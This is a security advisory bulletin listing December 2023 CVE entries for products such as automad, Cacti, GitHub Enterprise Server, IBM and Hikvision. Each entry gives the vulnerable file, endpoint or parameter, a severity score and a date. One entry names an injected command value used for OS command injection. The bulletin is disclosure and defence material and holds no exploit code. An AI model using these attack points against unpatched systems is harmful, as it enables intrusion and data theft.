automad — automad A vulnerability was found in automad up to 1.10.9. It has been declared as critical. This vulnerability affects the function import of the file FileController.php. The manipulation of the argument importUrl leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248686 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7037
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
automad — automad A vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 4.7 CVE-2023-7036
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
automad — automad A vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 4.3 CVE-2023-7038
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
aveva — edge An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts’ responses. 2023-12-16 5.3 CVE-2021-42794
cve@mitre.org
cve@mitre.org
cve@mitre.org
aws — aws-sdk-php AWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1. 2023-12-22 6 CVE-2023-51651
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
bazarr — bazarr Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols. 2023-12-15 5.3 CVE-2023-50266
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
beijing_baichuo — s210 A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688. 2023-12-21 6.3 CVE-2023-7039
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
bosch — building_integration_system_video_engine An improper handling of a malformed API answer packets to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability an attacker has to replace an existing API server e.g. through Man-in-the-Middle attacks. 2023-12-18 5.9 CVE-2023-35867
psirt@bosch.com
bosch — cpp14_firmware An information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet. 2023-12-18 5.3 CVE-2022-41677
psirt@bosch.com
cacti — cacti Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. Impact of the vulnerability – execution of arbitrary javascript code in the attacked user’s browser. This issue has been patched in version 1.2.26. 2023-12-22 6.1 CVE-2023-49086
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti. 2023-12-22 6.1 CVE-2023-49088
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php.` When uploading an xml template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains unfiltered xml template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available. 2023-12-22 5.4 CVE-2023-50250
security-advisories@github.com
security-advisories@github.com
clear — clearml_server Cross-site Scripting (XSS) – Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (I.e when a malicious party already has access to the internal network and to a user’s ClearML login credentials). 2023-12-18 5.4 CVE-2023-6778
security@huntr.dev
security@huntr.dev
clickhouse — clickhouse ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. This vulnerability is an integer underflow resulting in crash due to stack buffer overflow in decompression of FPC codec. It can be triggered and exploited by an unauthenticated attacker. The vulnerability is very similar to CVE-2023-47118 with how the vulnerable function can be exploited. 2023-12-21 5.9 CVE-2023-48298
security-advisories@github.com
security-advisories@github.com
codelyfe — stupid_simple_cms A vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: ‘../filedir’. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability. 2023-12-21 5.4 CVE-2023-7041
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codelyfe — stupid_simple_cms A vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability. 2023-12-21 4.3 CVE-2023-7040
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
corveda — phpsandbox A vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability. 2023-12-19 4.3 CVE-2014-125107
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
csharp — cws_collaborative_development_platform SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can’t disrupt service or obtain sensitive information. 2023-12-15 6.5 CVE-2023-48374
twcert@cert.org.tw
dell — cpg_bios Dell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system. 2023-12-22 6.7 CVE-2023-39251
security_alert@emc.com
dell — emc_networker Dell NetWorker Virtual Edition versions 19.8 and below contains the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure. 2023-12-18 5.3 CVE-2023-28053
security_alert@emc.com
dfir-iris — iris-web Iris is a web collaborative platform aiming to help incident responders sharing technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker need to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available. 2023-12-22 4.6 CVE-2023-50712
security-advisories@github.com
security-advisories@github.com
dfirkuiper — kuiper A vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability. 2023-12-18 5.9 CVE-2023-6908
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
efacec — uc_500e An attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application. 2023-12-20 6.3 CVE-2023-50703
ics-cert@hq.dhs.gov
efacec — uc_500e An attacker could create malicious requests to obtain sensitive information about the web server. 2023-12-20 5.3 CVE-2023-50705
ics-cert@hq.dhs.gov
efacec — uc_500e An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users. 2023-12-20 4.3 CVE-2023-50704
ics-cert@hq.dhs.gov
efacec — uc_500e A user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens. 2023-12-20 4.1 CVE-2023-50706
ics-cert@hq.dhs.gov
enterprise_server — enterprise_server Improper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the “Get a check run” API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7 3.10.4, and 3.11.0. 2023-12-21 5.3 CVE-2023-46646
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server — enterprise_server An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 4.9 CVE-2023-51379
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server — enterprise_server Improper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-21 6.5 CVE-2023-6804
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server — enterprise_server A race condition in GitHub Enterprise Server allows an outside collaborator to be added while a repository is being transferred. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-21 5.8 CVE-2023-6803
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
ethex — contracts A vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271. 2023-12-19 4.3 CVE-2019-25157
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gallagher — command_centre Client-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior. 2023-12-18 5.4 CVE-2023-23570
disclosures@gallagher.com
gallagher — command_centre_diagnostics_service A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)). 2023-12-18 5.5 CVE-2023-46686
disclosures@gallagher.com
gallagher — command_centre_server Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior. 2023-12-18 4.3 CVE-2023-23576
disclosures@gallagher.com
gallagher — command_centre_server An observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all version of 8.50 and prior. 2023-12-18 4.3 CVE-2023-23584
disclosures@gallagher.com
gallagher — controller_7000 Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)). 2023-12-18 6.8 CVE-2023-6355
disclosures@gallagher.com
getsentry — symbolicator Symbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator’s API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`. 2023-12-22 4.3 CVE-2023-51451
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
github — enterprise_server A path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. 2023-12-21 6.8 CVE-2023-46645
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github — enterprise_server A race condition in GitHub Enterprise Server was identified that could allow an attacker administrator access. To exploit this, an organization needs to be converted from a user. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 6.3 CVE-2023-46649
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag. 2023-12-15 6.5 CVE-2023-6051
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading for incorrect representation in the UI. 2023-12-15 5.7 CVE-2023-5512
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API. 2023-12-15 4.3 CVE-2023-5061
cve@gitlab.com
cve@gitlab.com
gradio — gradio Gradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0. 2023-12-22 5.6 CVE-2023-51449
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
grails — grails Grails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0. 2023-12-21 6.5 CVE-2023-46131
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
hcl_software — hcl_bigfix_mobile/modern_client_management Due to this vulnerability, the Master operator could potentially incorporate an SVG tag into HTML, leading to an alert pop-up displaying a cookie. To mitigate stored XSS vulnerabilities, a preventive measure involves thoroughly sanitizing and validating all user inputs before they are processed and stored in the server storage. 2023-12-21 6.6 CVE-2023-28025
psirt@hcl.com
hcl_software — hcl_launch HCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. 2023-12-21 4.3 CVE-2023-45700
psirt@hcl.com
hcltech — connections HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data. 2023-12-15 6.5 CVE-2023-28022
psirt@hcl.com
hikvision — intercom_broadcast_system A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability. 2023-12-17 6.5 CVE-2023-6894
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hikvision — intercom_broadcasting_system A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. 2023-12-17 6.3 CVE-2023-6895
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hitachi_energy — rtu500_series_cmu Vulnerability exists in SCI IEC 60870-5-104 and HCI IEC 60870-5-104 that affects the RTU500 series product versions listed below. Specially crafted messages sent to the mentioned components are not validated properly and can result in buffer overflow and as final consequence to a reboot of an RTU500 CMU. 2023-12-19 5.9 CVE-2023-6711
cybersecurity@hitachienergy.com
home_assistant — home_assistant Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it. 2023-12-15 4.3 CVE-2023-50715
security-advisories@github.com
security-advisories@github.com
ibm — aix IBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963. 2023-12-22 6.2 CVE-2023-45165
psirt@us.ibm.com
psirt@us.ibm.com
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970. 2023-12-19 6.2 CVE-2023-45172
psirt@us.ibm.com
psirt@us.ibm.com
ibm — cloud_pak_for_business_automation IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805. 2023-12-18 4.9 CVE-2023-40691
psirt@us.ibm.com
psirt@us.ibm.com
ibm — db2_mirror_for_i IBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim’s PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532. 2023-12-18 5.3 CVE-2023-47741
psirt@us.ibm.com
psirt@us.ibm.com
ibm — informix_jdbc IBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116. 2023-12-20 6.3 CVE-2023-35895
psirt@us.ibm.com
psirt@us.ibm.com
ibm — qradar_siem IBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372. 2023-12-19 4.9 CVE-2023-47146
psirt@us.ibm.com
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197. 2023-12-20 5.3 CVE-2023-47703
psirt@us.ibm.com
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522. 2023-12-20 5.4 CVE-2023-47707
psirt@us.ibm.com
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228. 2023-12-20 4.3 CVE-2023-47705
psirt@us.ibm.com
psirt@us.ibm.com
ibm — urbancode_deploy An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509. 2023-12-20 6.2 CVE-2023-42012
psirt@us.ibm.com
psirt@us.ibm.com
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510. 2023-12-20 5.3 CVE-2023-42013
psirt@us.ibm.com
psirt@us.ibm.com
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799. 2023-12-20 5.3 CVE-2023-47161
psirt@us.ibm.com
psirt@us.ibm.com
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. IBM X-Force ID: 265512. 2023-12-19 4.3 CVE-2023-42015
psirt@us.ibm.com
psirt@us.ibm.com
idemia — multiple_products
 		 When handling contactless cards, usage of a specific function to get additional information from the card which doesn’t check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 6.8 CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
infinispan — infinispan A flaw was found in Infinispan’s REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. 2023-12-18 6.5 CVE-2023-3628
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
infinispan — infinispan A flaw was found in Infinispan’s REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. 2023-12-18 4.3 CVE-2023-3629
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
infinispan — infinispan-server A flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service. 2023-12-18 4.4 CVE-2023-5236
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
instipod — duouniversalkeycloakauthenticator An information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. An user login to Keycloak using DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability. 2023-12-23 4.5 CVE-2023-49594
talos-cna@cisco.com
talos-cna@cisco.com
insyde — insydeh2o TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process. 2023-12-16 4.7 CVE-2022-24351
cve@mitre.org
cve@mitre.org
iscute — cute_http_file_server Cross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page. 2023-12-20 5.4 CVE-2023-50639
cve@mitre.org
i̇stanbul_soft_informatics_and_consultancy_limited_company — softomi_geli?mi?_c2c_pazaryeri_yaz?l?m? Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ?stanbul Soft Informatics and Consultancy Limited Company Softomi Geli?mi? C2C Pazaryeri Yaz?l?m? allows Reflected XSS. This issue affects Softomi Geli?mi? C2C Pazaryeri Yaz?l?m?: before 12122023. 2023-12-21 6.1 CVE-2023-6122
iletisim@usom.gov.tr
jetbrains — intellij_idea In JetBrains IntelliJ IDEA before 2023.3.2 code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration 2023-12-21 6.3 CVE-2023-51655
cve@jetbrains.com
jetbrains — youtrack In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed 2023-12-15 4.3 CVE-2023-50871
cve@jetbrains.com
kaifa — webitr_attendance_system Kaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database. 2023-12-15 6.5 CVE-2023-48395
twcert@cert.org.tw
kaifa — webitr_attendance_system Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message. 2023-12-15 4.3 CVE-2023-48393
twcert@cert.org.tw
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘adults’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49269
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_in_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49270
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_out_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49271
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘children’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49272
help@fluidattacks.com
help@fluidattacks.com
kodcloud — kodexplorer Reflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php. 2023-12-19 6.1 CVE-2023-49489
cve@mitre.org
libtiff — libtiff An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash. 2023-12-18 5.5 CVE-2023-6228
secalert@redhat.com
secalert@redhat.com
lightxun — iptv_gateway A vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579. 2023-12-21 4.3 CVE-2023-7026
